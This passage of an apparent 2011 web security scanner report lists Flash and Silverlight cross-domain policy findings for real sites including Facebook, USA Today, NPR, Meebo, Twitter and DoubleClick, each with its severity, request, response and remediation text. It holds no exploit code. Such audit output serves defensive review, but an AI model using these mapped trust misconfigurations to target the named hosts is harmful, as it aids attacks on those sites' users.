<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.71. http://rd.meebo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://rd.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: rd.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 09 May 2011 15:35:01 GMT
Content-Type: text/xml; charset=utf8
Content-Length: 91
Last-Modified: Wed, 26 Jan 2011 19:56:05 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
   <allow-access-from domain="*.meebo.com"/>
</cross-domain-policy>

3.72. http://share.meebo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://share.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: share.meebo.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 05 May 2010 22:56:50 GMT
ETag: "2211755815"
Content-Type: text/xml
Server: lighttpd/1.4.19
Cache-Control: max-age=604800
Expires: Mon, 16 May 2011 15:35:31 GMT
Date: Mon, 09 May 2011 15:35:31 GMT
Content-Length: 155
Connection: close

<cross-domain-policy>
<allow-access-from domain="*.meebo.com"/>
<allow-http-request-headers-from domain="*.meebo.com" headers="*"/>
</cross-domain-policy>

3.73. http://static.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.138.64.186
Date: Mon, 09 May 2011 15:35:53 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

3.74. http://syndication.mmismm.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: syndication.mmismm.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:02 GMT
Server: Apache
Last-Modified: Fri, 22 Apr 2011 21:27:32 GMT
ETag: "10e-4a188868f3900"
Accept-Ranges: bytes
Content-Length: 270
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.adap.tv"/>
...[SNIP]...

3.75. http://videos.usatoday.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://videos.usatoday.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: videos.usatoday.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "f3c5e455d9c4b849b778a0a303fe299c:1267469702"
Last-Modified: Mon, 01 Mar 2010 18:55:02 GMT
Accept-Ranges: bytes
Content-Length: 465
Content-Type: application/xml
Date: Mon, 09 May 2011 15:38:54 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.tv" secure="false" />
...[SNIP]...

3.76. http://www.collegesurfing.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.collegesurfing.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.collegesurfing.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:10 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Aug 2007 11:26:03 GMT
ETag: "219006d-c7-438d4dadd48c0"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml
Set-Cookie: BIGipServerwww.collegesurfing.com=1006764042.20480.0000; path=/

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.virtualcollegeadvisor.com" />
<allow-access-from domain="*.virtualcollegeadvisor.net" />
</cross-domain-policy>

3.77. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.111.43
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

3.78. http://www.meebo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 09 May 2011 15:35:02 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 303
Last-Modified: Thu, 28 Apr 2011 16:54:16 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="www.meebo.com"/>
<allow-access-from domain="*.meebo.com"/>
<allow-access-from domain="meebo.com"/>
<allow-access-from domain="*.meebome.com"/>
<allow-access-from domain="www.meebome.com"/>
<allow-access-from domain="meebome.com"/>
...[SNIP]...

3.79. http://www.npr.org/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.npr.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.npr.org

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:46 GMT
Server: Apache/2.2.14 (Unix)
Last-Modified: Thu, 07 Apr 2011 20:17:23 GMT
Accept-Ranges: bytes
Content-Length: 455
Cache-Control: max-age=600
Expires: Mon, 09 May 2011 15:49:46 GMT
Keep-Alive: timeout=10, max=4945
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.threespot.com"/>
   <allow-access-from domain="*.npr.org" />
   <allow-access-from domain="*.digitaria.com"/>
   <allow-access-from domain="www.kqed.org" />
   <allow-access-from domain="*.iheartnpr.org" />
   <allow-access-from domain="apps.facebook.com" />
...[SNIP]...

3.80. http://www.usatoday.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:44 GMT
Accept-Ranges: bytes
ETag: "befaf11117e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:36:43 GMT
Connection: close
Content-Length: 1558

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

3.81. http://api.twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:41 GMT
Server: hi
Status: 200 OK
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Content-Type: application/xml
Content-Length: 561
Set-Cookie: k=173.193.214.243.1304955581869571; path=/; expires=Mon, 16-May-11 15:39:41 GMT; domain=.twitter.com
Cache-Control: max-age=1800
Expires: Mon, 09 May 2011 16:09:41 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

4. Silverlight cross-domain policy
There are 16 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Mon, 09 May 2011 15:35:02 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.2. http://ads.pointroll.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:11e6"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Mon, 09 May 2011 15:35:08 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

4.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 10 May 2011 15:34:58 GMT
Date: Mon, 09 May 2011 15:34:58 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

4.4. http://b.voicefive.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 10 May 2011 15:35:23 GMT
Date: Mon, 09 May 2011 15:35:23 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

4.5. http://content.usatoday.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT
Accept-Ranges: bytes
ETag: "80d976d8f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:38:09 GMT
Connection: close
Content-Length: 730

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...

4.6. http://contextweb.usatoday.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://contextweb.usatoday.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: contextweb.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT
Accept-Ranges: bytes
ETag: "80d976d8f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 730
Date: Mon, 09 May 2011 15:36:35 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...

4.7. http://data.usatoday.net/clientaccesspolicy.xml

Summary